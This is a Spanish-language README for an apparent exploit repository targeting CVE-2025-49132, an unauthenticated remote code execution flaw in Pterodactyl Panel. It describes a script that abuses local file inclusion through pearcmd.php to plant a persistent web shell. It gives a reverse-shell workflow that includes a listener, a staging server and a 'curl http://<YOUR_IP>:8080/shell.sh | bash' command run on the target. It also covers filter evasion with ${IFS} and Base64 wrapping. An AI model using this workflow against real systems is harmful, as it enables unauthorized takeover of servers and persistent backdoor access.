
Este repositorio contiene un exploit especializado para CVE-2025-49132, una vulnerabilidad crítica de Ejecución Remota de Código (RCE) sin autenticación en Pterodactyl Panel (anteriores a v1.11.11).
La vulnerabilidad existe en el endpoint /locales/locale.json. Al manipular los parámetros de consulta locale y namespace, un atacante puede aprovechar una Inclusión de Archivo Local (LFI) para interactuar con pearcmd.php. Esto permite la creación arbitraria de archivos y la ejecución de comandos, lo que conduce a un compromiso total del sistema.
El script ape.py automatiza los siguientes pasos:
Detección de PEAR: Fuzzea la estructura de directorios para localizar la instalación de PEAR en el objetivo.
Creación de backdoor: Utiliza config-create de PEAR para escribir un web shell persistente en /tmp/shell.php.
Para lograr un callback exitoso en el objetivo, sigue este flujo de trabajo:
penelope -p 4444
Servidor de staging: Si usas un script de shell personalizado, súbelo mediante Python:
python3 -m http.server 8080
python3 ape.py --host xxx.xxx.xxx --interactive
shell> curl http://<YOUR_IP>:8080/shell.sh | bash
Bypass de espacios: Usa automáticamente ${IFS} para garantizar que los payloads sobrevivan al análisis de URL.
Wrapper Base64: Envuelve los comandos de reverse shell en Base64 para evitar la alteración de caracteres por parte del Nginx/servidor web del objetivo.
Gestión de timeouts: Diseñado para detectar cuándo una reverse shell se ha conectado correctamente aunque la petición web se quede colgada.